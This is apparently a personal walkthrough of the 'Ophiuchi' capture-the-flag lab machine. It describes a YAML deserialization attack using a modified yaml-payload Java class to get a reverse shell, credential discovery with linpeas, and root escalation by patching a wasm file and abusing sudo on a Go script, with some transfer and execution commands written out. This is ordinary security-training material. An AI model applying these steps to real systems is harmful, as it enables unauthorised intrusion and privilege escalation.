In this post, i would like to share a walkthrough of the Ophiuchi Machine.
This room has been considered difficulty rated as a MEDIUM machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Information Gathering on Ophiuchi
Let’s open the browser and straight into the website interface.
We have the online yaml parser, but we cannot do anything here yet. Let’s run the gobuster in case we find anything useful there.
While gobuster is running, let’s move on to the next step by finding what is yaml-payload exploit is. We found this page and let’s download it on our machine.
We found one article that might be useful to us in the later activity
What we can do next is modify the AwesomeScriptingEngineFactory.java that stored in yaml-payload/src/artsploit directory
We also need to save the bash reverse shell on the directory so that we can use it later.
While modifying the file, let’s check on the gobuster result whether there’s any interesting found there.
We will have to compile the java file by using javac command but sadly it doesn’t work without the sudo
The result will look something such to the screenshot above.
Let’s compile everything into .jar file format with the command jar -cvf yaml-payload.jar src/ .
As usual, it needs sudo
Once it has completed the compilation, it will look exactly like the screenshot above.
Let’s run the python server to transfer the file so that we can execute the nc listener
We also need to start the nc listener for us to get the reverse shell connection back to us.
Playing the online yaml parser
For everything to happen smoothly, we need to try the command above for it to execute well.
The error above shows that we missed any lines on the command. However, let’s try again with the same step as above.
The transfer is working as i planned
We got the reverse shell connection back to us. So, let’s get the user flag on /home/admin
Sadly, we don’t have permission to read the user flag yet.
Enumerate with the linpeas on Ophiuchi machine
Let’s transfer the linpeas.sh into the target’s machine
Once we have successfully transferred it, we need to give permission of linpeas.sh to chmod +x linpeas.sh
On the linpeas.sh result, we found the password of username= admin. Let’s key-in the password we found here to get admin privileges and access
We successfully have login as admin, and we can read the user flag that stored at /home/admin/ directory
Escalate to Root Privileges Access on the Ophiuchi machine
Let’s escalate from user admin to root but we need to see anything that we can use by executing sudo -l.
I stuck from here onwards and get some advice around. Thanks to P3R5EU5 that have guided me along the way
Let’s research the .go file on the internet and we found an article under webassembly
On the website, it said as follows:
WebAssembly encodes a low-level, assembly-like programming language. This language is structured around the following concepts
We can see the source code by executing cat /opt/wasm-functions/index.go
I need to transfer main.wasm file on the same directory to our own machine to decode it
We have two options to decode this either using command or browser which i will use the browser instead here.
We need to upload the main.wasm to modify the file from (i32.const. 0)) to (i32.const. 1))
We need to copy-paste the wasm file that we manage to modify to this website and download the test.wasm file into our machine. Now, we need to transfer the main.wasm into the target’s machine by using python3 -m http.server 4444
For us transferring the file into the target’s machine, we can use the command wget http://<ip address>:<port>/main.wasm
We need to give execute permission to the main.wasm
We need to move the file to /home/admin by mv /dev/shm/main.wasm .
Aside from that, we also need to create deploy.sh where i have included cat /root/root.txt
We also can use the command sudo /usr/bin/go run /opt/wasm-functions/index.go
Happy Learning Guys!